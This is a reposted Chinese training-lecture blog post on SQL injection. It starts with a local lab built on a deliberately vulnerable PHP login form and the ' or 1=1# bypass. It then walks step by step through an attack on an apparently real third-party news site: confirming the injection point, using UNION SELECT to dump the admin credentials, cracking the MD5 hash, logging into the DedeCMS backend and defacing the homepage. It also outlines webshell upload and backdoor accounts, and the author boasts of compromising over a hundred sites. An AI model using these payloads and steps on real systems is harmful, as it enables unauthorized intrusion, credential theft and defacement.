Web安全篇之SQL注入攻击

在网上找了一篇关于sql注入的解释文章，还有不少技术，蜻蜓点水吧

文章来源：http://www.2cto.com/article/201310/250877.html

ps:直接copy，格式有点问题~

你们早上好！今天由我给你们带来《web安全之SQL注入篇》系列晨讲，首先对课程进行简单介绍，SQL注入篇一共分为三讲：
       第一讲：“纸上谈兵：咱们须要在本地架设注入环境，构造注入语句，了解注入原理。”；
       第二讲：“实战演练：咱们要在互联网上随机对网站进行友情检测，活学活用，触类旁通”；
       第三讲：“扩展内容：挂马，提权，留门。此讲内容颇具危害性，不予演示。仅做概述”。
    这个主题涉及的东西仍是比较多的，结合咱们前期所学。主要是让你们切身体会一下，管中窥豹，起到知己知彼的做用。千里之堤溃于蚁穴，之后进入单位，从事相关程序开发，必定要谨小慎微。
 
问：你们知道骇客们攻击网站主要有哪些手法？   
      SQL注入，旁注，XSS跨站，COOKIE欺骗，DDOS，0day 漏洞，社会工程学 等等等等，只要有数据交互，就会存在被入侵风险！哪怕你把网线拔掉，物理隔绝，我还能够利用传感器捕捉电磁辐射信号转换成模拟图像。你把门锁上，我就爬窗户；你把窗户关上，我就翻院墙；你把院墙加高，我就挖地洞。。。道高一尺魔高一丈，我始终坚信计算机不存在绝对的安全，你攻我防，此消彼长，有时候，魔与道只在一念之间。
    下面，就让咱们一块儿推开计算机中那另外一扇鲜为人知的门---
 
   1、纸上谈兵

   （一）了解注入原理
    为何会存在sql注入呢，只能说SQL出身很差。由于sql做为一种解释型语言，在运行时是由一个运行时组件解释语言代码并执行其中包含的指令的语言。基于这种执行方式，产生了一系列叫作代码注入（code injection）的漏洞 。它的数据实际上是由程序员编写的代码和用户提交的数据共同组成的。程序员在web开发时，没有过滤敏感字符，绑定变量，致使攻击者能够经过sql灵活多变的语法，构造精心巧妙的语句，不择手段，达成目的，或者经过系统报错，返回对本身有用的信息。
    咱们在学JDBC和SQL时，讲师跟咱们说 Statement不能防止SQL注入, PreparedStatement可以防止SQL注入. 没错, 这句话是没有问题的, 但到底如何进行SQL注入?怎么直观的去了解SQL注入?这仍是须要花必定的时间去实验的.预编译语句java.sql.PreparedStatement ,扩展自 Statement,不但具备 Statement 的全部能力并且具备更强大的功能。不一样的是，PreparedStatement 是在建立语句对象的同时给出要执行的sql语句。这样，sql语句就会被系统进行预编译，执行的速度会有所增长，尤为是在执行大语句的时候，效果更加理想。并且PreparedStatement中绑定的sql语句是能够带参数的。
   （二）架设注入环境
    咱们知道如今php做为一门网页编程语言真是风生水起，利用lamp(linux+apache+mysql+php)或者wamp(windows+apache+mysql+php)搭建网站环境，如腾讯的discuz、阿里的 phpwind 以及织梦的dedecms 等建站程序,占据了国内网站的半壁江山。那么咱们今天即以这种架构为假象敌，首先是在本地架设wamp环境。须要用到的工具备：apache,mysql,php ，这几个组件能够单独下载安装，不过安装配置过程较为繁琐，仍是建议新手直接从网上下载phpnow ，一个绿色程序，包含上述三个组件，傻瓜化操做就能够了。
      而后呢，咱们要创建测试用的数据表，编写html,php,文件，经过实例具体来演示经过SQL注入，登入后台管理员界面。这里，我以前已经写好了，你们看下：

1.建立一张试验用的数据表：

CREATE TABLE users (
　　id int(11) NOT NULL AUTO_INCREMENT,
　　username varchar(64) NOT NULL,
　　password varchar(64) NOT NULL,
　　email varchar(64) NOT NULL,
　　PRIMARY KEY (id),
　　UNIQUE KEY username (username)
);

添加一条记录用于测试：

INSERT INTO users (username,password,email)
VALUES('tarena',md5('admin'),'tarena@admin.com');

　　

2.接下来，贴上登陆界面的源代码：

<html>
<head>
<title>Sql注入演示</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body >
<form action="validate.php" method="post">
  <fieldset >
    <legend>Sql注入演示</legend>
    <table>
      <tr>
        <td>用户名：</td>
        <td><input type="text" name="username"></td>
      </tr>
      <tr>
        <td>密&nbsp;&nbsp;码：</td>
        <td><input type="text" name="password"></td>
      </tr>
      <tr>
        <td><input type="submit" value="提交"></td>
        <td><input type="reset" value="重置"></td>
      </tr>
    </table>
  </fieldset>
</form>
</body>
</html>

当用户点击提交按钮的时候，将会把表单数据提交给validate.php页面，validate.php页面用来判断用户输入的用户名和密码有没有都符合要求(这一步相当重要，也每每是SQL漏洞所在)。

3.验证模块代码以下：

<html>
<head>
<title>登陆验证</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<?php
       $conn=@mysql_connect("localhost",'root','') or die("数据库链接失败！");;
       mysql_select_db("injection",$conn) or die("您要选择的数据库不存在");
       $name=$_POST['username'];
       $pwd=$_POST['password'];
       $sql="select * from users where username='$name' and password='$pwd'";
       $query=mysql_query($sql);
       $arr=mysql_fetch_array($query);
       if(is_array($arr)){
              header("Location:manager.php");
       }else{
              echo "您的用户名或密码输入有误，<a href=\"Login.php\">请从新登陆！</a>";
       }
?>
</body>
</html>

注意到了没有，咱们直接将用户提交过来的数据(用户名和密码)直接拿去执行，并无实现进行特殊字符过滤，待会大家将明白，这是致命的。

 代码分析：若是，用户名和密码都匹配成功的话，将跳转到管理员操做界面(manager.php)，不成功，则给出友好提示信息。

   （三）演示注入手法　　
　　到这里，前期工做已经作好了，咱们看这个登陆界面，虽然说是简陋了点。但具备通常登陆认证的功能。普通人看这个不过是一个登陆界面，但从攻击者角度来讲，透过现象看本质，咱们应当意识到隐藏在这个登陆页面背后的是一条select 语句---
　　OK！ 接下来将展开咱们的重头戏：SQL注入
　　填好正确的用户名(tarena)和密码(admin)后，点击提交，将会返回给咱们“欢迎管理员”的界面。
　　由于根据咱们提交的用户名和密码被合成到SQL查询语句当中以后是这样的：
　　    select * from users where username='tarena' and password=md5('admin')
　　很明显，用户名和密码都和咱们以前给出的同样，确定可以成功登录。可是，若是咱们输入一个错误的用户名或密码呢?很明显，确定登入不了吧。恩，正常状况下是如此，可是对于有SQL注入漏洞的网站来讲，只要构造个特殊的“字符串”，照样可以成功登陆。
　　好比：在用户名输入框中输入:’or 1=1#,密码随便输入，这时候的合成后的SQL查询语句为：
　　    select * from users where username='' or 1=1#' and password=md5('')
　　语义分析：“#”在mysql中是注释符，这样井号后面的内容将被mysql视为注释内容，这样就不会去执行了，换句话说，如下的两句sql语句等价：
　　    select * from users where username='' or 1=1#' and password=md5('')
　　等价于
　　    select * from users where username='' or 1=1
　　由于1=1永远都是成立的，即where子句老是为真，将该sql进一步简化以后，等价以下select语句：
　　    select * from users
　　没错，该sql语句的做用是检索users表中的全部字段
    果不其然，咱们利用万能语句(’or 1=1#)可以登陆！看到了吧，一个经构造后的sql语句竟有如此可怕的破坏力，相信你看到这后，开始对sql注入有了一个理性的认识了吧~
 
    2、实战演练

    OK,前面铺垫了那么多，算是给你们科普了。如今咱们进行第二讲，实战演练。开始以前呢，有一个互动环节。如今请你们用本身的手机登陆 http://www.guoshang.tk  这个网址，简单看下。待会等咱们注入攻击以后，再次登陆，好对比效果，对于sql注入攻击有一个更加直观的认识。
 
   （一）积极备战 
    1。首先设置浏览器，工具--internet选项--安全--找到“显示友好的http信息”,把前面的勾去掉；
    2。打开谷歌，寻找注入点。为了节省时间，这里我已经事先找好目标点
                http://www.guoshang.tk；
       谷歌搜索小技巧：筛选关键字："inurl:/news/read.php?id="

   （二）狼烟四起
    1。咱们打开这个网址，一个新闻网站，,咱们点击[百家争鸣]板块，这是一个国内外新闻速览的栏目，好多时政的帖子，咱们点击一个，OK，如今进入单个帖子界面，首先咱们看下当前帖子的URL地址，
        http://www.guoshang.tk/news/read.php?id=50
    能够看出这是一个动态URL，也就是说能够在地址栏中传参，这是SQL注入的基本条件。
    2。判断是否存在sql注入可能。在帖子地址后面空上一格，敲入 and 1=1 ,而后 and 1=2 。这两句什么意思呢？ 一个恒等式，一个恒不等式，敲入 and 1=1 帖子返回正常， and 1=2 时帖子返回出错，说明sql语句被执行，程序没有对敏感字符进行过滤。如今咱们能够肯定此处是一个SQL注入点，程序对带入的参数没有作任何处理，直接带到数据库的查询语句中。能够推断出在访问
        http://www.guoshang.tk/news/read.php?id=50
    时数据库中执行的SQL语句大概是这样的： 
        Select * from [表名] where id=50 
    添加and 1=1后的SQL语句： 
        Select * from [表名] where id=50 and 1=1   
        因为条件and 1=1永远为真，因此返回的页面和正常页面是一致的 
    添加and 1=2后的SQL语句： 
        Select * from [表名] where id=50 and 1=2   
        因为条件1=2永远为假，因此返回的页面和正常页面不一致 
    3。爆数据库。肯定注入点仅仅意味着开始。如今，咱们回到原先的帖子地址：
            http://www.guoshang.tk/news/read.php?id=50  
       如今要判断数据库类型以及版本，构造语句以下：
            http://www.guoshang.tk/news/read.php?id=50 and ord(mid(version(),1,1))>51 
            发现返回正常页面，说明数据库是mysql，而且版本大于4.0，支持union查询，反之是4.0
            如下版本或者其余类型数据库。 
    4。爆字段。接着咱们再构造以下语句来猜表中字段： 
            a. http://www.guoshang.tk/news/read.php?id=50 order by 10    
            返回错误页面，说明字段小于10 
            b. http://www.guoshang.tk/news/read.php?id=50 order by 5    
            返回正常页面，说明字段介于5和10之间 
            c. http://www.guoshang.tk/news/read.php?id=50 order by 7    
            返回错误页面，说明字段大于5小于7，能够判断字段数是6.下面咱们再来确认一下 
            d. http://www.guoshang.tk/news/read.php?id=50 order by 6     
        返回正常页面，说明字段确实是6这里采用了“二分查找法”，这样能够减小判断次数，节省时间。若是采用从order by 1依次增长数值的方法来判断，须要7次才能够肯定字段数，采用“二分查找法”只须要4次就够。当字段数很大时，二分查找法的优点更加明显，效率更高。 
    5。爆表.肯定字段以后如今咱们要构造联合查询语句(union select )，语句以下：     
           http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,3,4,5,6   
        咱们来看帖子页面，原先内容没有了，取而代之的是返回给了咱们 三个数字，分别是3，5，6 咱们随便选择一个，这里的3，5，6指的是咱们能够把联合查询的对应位置替换为 咱们想要查询的关键字，好比版本，数据库名称，主要是用来探测web系统的信息。
    6。爆用户名、密码。咱们选择3 吧，OK,如今把3给替换掉，先查询下数据库库名，构造语句以下
           http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select                                                                  1,2,database(),4,5,6     
           浏览器给咱们返回了 xinwen  。说明这个网站 的数据库库名是 xinwen  . 
       如今咱们用一样的手法查询下 管理员信息 ，构造语句以下：
           http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select                                                                  1,2,user(),4,5,6
           返回 root@localhost ，是个管理员权限。
       如今咱们再用一样的手法查询用户名，密码，构造语句以下：
            http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select
                                                           1,2,username,4,5,6 from admin 
            返回 admin
            http://www.guoshang.tk/news/read.php?id=50 and 1=2 union select                                                             1,2,password,4,5,6 from admin
            返回 B2E5B76793EDA747382E81391AA3A400  
    7。md5解密。看到这里，有的同窗可能会有点紧张。其实返回的这个是字符串密码通过32位md5加密后的值。上次李翊大帝给咱们复习的时候 讲过加密与解密。也稍稍提到了md5 摘要算法，不可逆。话虽如此，如今互联网上crack md5 “解密”md5 的网站不少，这里我给解密加了引号，是由于其“解密”原理是 md5 值既然不能进行 逆向破解，可是一样的字符串通过一样的md5加密算法所生成的md5值是同样的，咱们能够从新构造字符串生成md5值，而后对比两个值，若是同样则字符串同样。有人说，这种方法岂不是海底捞针，试到猴年马月去啊，其实否则，互联网云时代已经到来，大数据的信息挖掘以及分布式运算能够解决不少相似大运算量的问题。咱们如今就要来对这个md5值进行比对，有好多网站提供这种服务，咱们找一个。（http://www.md5.com.cn ） 这个网址，咱们把这个值复制进去，而后点击“MD5 CRACK“，“解密”时间，视密码复杂度而定，OK，结果出来，(chinaadmin)
    8。登陆后台。如今咱们已经拿到网站的管理员账号密码，感谢上帝，一帆风顺，但还不能高兴得太早。不少状况是你虽然拿到了钥匙，可是找不到门。下面咱们就来找一下门，找以前要有个基本思路：
       ①先试下几个比较经常使用的目录；
       ②不行的话，由于这个论坛程序是dedecms5.6 ，因此咱们就到 织梦官方，下载一套一样程序，           分析网站管理路径，或者直接百度“dedecms默认管理界面”便可，下载步骤可省略；
       ③手工不通，借力工具。明小子，啊D，御剑，均可以。
    9。这里咱们发现此网站依然采用程序默认管理路径：
            http://www.guoshang.tk/dede 
            输入用户名 admin ，密码 chinaadmin 成功登入。
        接下来，咱们找到【核心】--【附件管理】--【文件式管理器】--这时咱们能够看到网站根目录下全部目录以及文件，下标栏还有几个功能选项，咱们能够看到网站首页文件【index.html】，点击【修改】，进入网页源代码编辑模式，删除全部源码(这招有点毒，劝告别改人家的源码，建议新建一个文件)，留个言，表示到此一游。
            卑鄙是卑鄙者的通行证，高尚是高尚者的墓志铭----- 北岛
        如今是见证奇迹的时刻！请你们再次登陆这个网站，有没有把你和你的小伙伴们惊呆呢？！
 
        至此，战斗结束。若干年的免费住宿，每日三餐在向你招手。。。
 
   3、扩展部分
   鉴于此讲内容危害性较大，不予演示。只简述其流程。
   （一）webshell提权
        二讲结束，咱们仅仅取得网站管理员权限，操做范围仅限当前网站。革命还没有成功，同志仍需努力。若想深刻挖掘，则必须寻求更大突破。得到网站webshell .
        ①准备一个php网马。（网上泛滥成灾，本身下载。但要注重分辨，当心螳螂捕蝉黄雀在后）;
        ②登陆网站后台--【核心】--【附件管理】--【文件式管理器】--选择下标栏中的【文件上传
          选项，上传咱们实现准备的php网马文件（tarena.php）；
        ③上传完毕，点击预览，记录下url地址。新建浏览器窗口，复制粘贴，打开以后，能够看到咱们的网马成功挂载，输入密码tarena(密码能够自行用记事本打开修改编辑)；
        ④进入网马管理界面，你会被那华丽丽的操做选项惊呆了！（取决网马水平，小马就别谈了，这里指的是大马）。从程序目录-网站根目录-各类强大的功能，乃至直接操做服务器磁盘文件，获取各类系统信息，跃马扬鞭，如入无人之境。其破坏力之大，使人咂舌！因此拜托各位亲，必定要盗亦有道，手下留情，除了靠法律监管，也要靠我的道德约束。
 
   （二）暗修栈道
        浴血奋战、攻城拔寨以后，怎样保卫来之不易的胜利果实？政治治大国若烹小鲜，入侵则烹小鲜如治大国。为长远计，咱们须要创建一种长期和肉鸡保持联系的机制。并且还要很隐蔽，毕竟这是见不得光的。留后门的方法诸多：
        ①开启telnet服务     
           创建匿名帐户，添加至超级管理员组；
        ②开启远程终端服务；
             ③自制木马触发事件...
        因系统平台而异，这里再也不赘言。
 
 
后注：

①可能有读者会以为此文很假，的确，鉴于篇幅问题，文中目标站点是我事先踩点过的，因此才
        会一路凯歌，事实上不多会有站点会如此理想，但万变不离其宗，只是时间问题罢了。
      ②文中所述演示环境创建在同时知足两个条件下：
           1.php配置文件中魔术引号已关闭；
           2.建站程序中没有对用户输入字符进行过滤。
 
 
      实际生活中，相似的SQL注入漏洞已经是明日黄花，国内大大小小的网站都已经补上漏洞。但，百密必有一疏，入侵是偶然的，但安全绝对不是必然的。笔者曾在晨讲以前利用了一天的时间，采起手工加工具的手段批量扫描了一批站点，并最终成功攻克一百有余。其中SQL注入漏洞确实不多，但各种0day漏洞层出不穷，更为严重的是后者比前者更加致命，互联网的高速发展给人们带来便利的同时也潜伏着很是多的风险，目前国内网络安全领域人才缺口很是大！但愿达内可以审时度势，占领市场先机，早日开设网络安全专业，为社会经济建设保驾护航

 

 

*************转摘： http://www.javashuo.com/article/p-yzwgetuh-e.html